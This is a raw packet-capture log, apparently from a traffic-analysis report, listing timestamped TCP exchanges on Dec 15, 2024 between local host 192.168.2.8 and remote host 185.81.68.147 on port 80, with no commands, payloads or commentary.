                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.482161999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.482215881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.482336998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.482336998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.483052969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.483206987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.483355045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.483977079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.484080076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.484240055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.484776974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.484853029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.485296965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.485546112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.485630035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.486274004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.486352921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.486377954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.486416101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.487272978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.487396955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.487554073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.488106012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.488260984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.488389015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.489021063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.489123106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.489303112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.489947081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.490048885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.490839005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.490968943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.490997076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.491854906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.491921902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.491992950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.491992950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.492738962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.492856026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.493032932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.493644953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.493695021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.493824959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.494519949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.494635105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.494888067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.495498896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.495574951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.495722055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.496362925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.496468067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.496898890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.497262001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.497404099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.498205900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.498336077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.498353958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.499131918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.499217987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.499295950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.499295950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.500061035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.500149012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.500963926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.501066923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.501076937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.501317978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.501883984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.501998901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.502154112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.502856970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.502895117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.503273964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.503710032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.503839016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.504753113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.504810095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.504889011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.504889011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.505662918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.505692005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.505878925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.506467104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.506603003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.506781101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.507411003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.507502079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.508301020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.508455038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.508475065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.509041071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.509231091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.509430885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.509569883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.510195971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.510268927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.510516882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.511077881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.511208057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.511989117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.512101889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.512111902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.512904882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.513039112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.513079882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.513830900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.513937950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.513988972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.514127016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.514761925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.514844894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.515000105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.515739918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.515799999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.515924931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.516570091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.516674042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.517349005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.517509937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.517648935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.518429995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.518517971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.518563032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.518563032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.519303083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.532560110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.532591105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.532861948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.532896042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.533016920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.533164024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.533821106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.533890009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.533992052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.534929991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.534944057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.535142899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.535916090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.535929918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.536040068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.536614895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.536685944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.536752939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.537532091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.537638903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.537656069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.538619041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.538717985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.538836002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.539390087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.539478064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.539700031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.540730953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.540796995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.540906906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.672713995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.672805071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.672857046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.673000097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.673079967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.673830986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.673918009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.673964977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.674125910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.674686909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.674808979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.674920082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.675590992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.675698996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.675816059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.676558971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.676621914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.677450895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.677551985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.677576065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.678350925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.678455114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.678615093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.678615093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.679267883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.679377079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.680191994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.680320024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.681096077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.681204081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.681204081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.681220055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.681756020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.682054996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.682136059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.682960987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.683052063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.683100939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.683100939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.683887959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.684025049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.684472084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.684801102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.684969902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.685165882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.685713053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.685833931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.685930014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.686635971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.686732054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.686855078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.687562943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.687689066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.687778950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.688467026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.688596010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.689001083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.689395905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.689521074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.689789057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.690531015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.690593958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.690778017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.691220999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.691319942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.691848040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.692167044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.692291021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.693099022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.693223953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.693263054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.694048882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.694092989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.694175005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.694329977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.694911957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.695045948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.695334911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.695841074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.695940971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.696796894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.696841955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.696877003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.696995974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.697686911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.697789907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.697901964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.698594093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.698712111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.699120998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.699523926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.699642897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.699738979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.700464010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.700558901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.700793028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.701415062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.701523066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.701854944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.702282906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.702375889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.702513933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.703191042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.703366041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.703598022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.704108953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.704224110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.704349995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.705032110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.705224991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.705372095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.705949068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.706053972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.706185102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.706860065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.706973076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.707911015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.707979918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.708014965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.708138943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.708709002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.708822966 CET8049709185.81.68.147192.168.2.8
